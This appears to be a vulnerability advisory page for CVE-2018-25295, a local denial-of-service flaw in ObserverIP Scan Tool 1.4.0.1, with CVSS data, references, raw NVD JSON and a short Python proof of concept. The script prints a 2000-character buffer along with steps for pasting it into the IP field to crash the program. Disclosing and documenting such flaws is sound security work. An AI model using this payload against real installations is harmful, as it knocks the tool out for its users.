CVE-2018-25295

Description

ObserverIP Scan Tool 1.4.0.1 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the IP input field. Attackers can paste a 2000-byte buffer of repeated characters into the IP field and trigger a search operation to cause an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ObserverIP Scan Tool 1.4.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2018-25295
# Description: Generates a payload to crash ObserverIP Scan Tool 1.4.0.1
# Usage: Copy the generated payload and paste it into the IP input field, then click Search.

import sys

def generate_payload():
    # Create a buffer of 2000 bytes
    # The vulnerability is triggered by an excessively long string in the IP field
    buffer = 'A' * 2000
    return buffer

if __name__ == "__main__":
    payload = generate_payload()
    print(f"[*] Generating payload for CVE-2018-25295")
    print(f"[*] Payload Length: {len(payload)} bytes")
    print(f"[*] Payload: {payload}")
    print("\n[+] Steps to reproduce:")
    print("1. Open ObserverIP Scan Tool 1.4.0.1")
    print("2. Copy the payload above.")
    print("3. Paste the payload into the 'IP' input field.")
    print("4. Click 'Search' or trigger the scan operation.")
    print("5. Observe the application crash (Denial of Service).")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25295
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25295
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25295/
[4] VulDB https://vuldb.com/cve/CVE-2018-25295
[5] https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe
[6] https://www.ambientweather.com
[7] https://www.exploit-db.com/exploits/45204
[8] https://www.vulncheck.com/advisories/observerip-scan-tool-denial-of-service-via-ip-field

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25295", "sourceIdentifier": "[email protected]", "published": "2026-04-26T22:17:30.957", "lastModified": "2026-04-27T18:53:00.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ObserverIP Scan Tool 1.4.0.1 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the IP input field. Attackers can paste a 2000-byte buffer of repeated characters into the IP field and trigger a search operation to cause an application crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe", "source": "[email protected]"}, {"url": "https://www.ambientweather.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45204", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/observerip-scan-tool-denial-of-service-via-ip-field", "source": "[email protected]"}]}}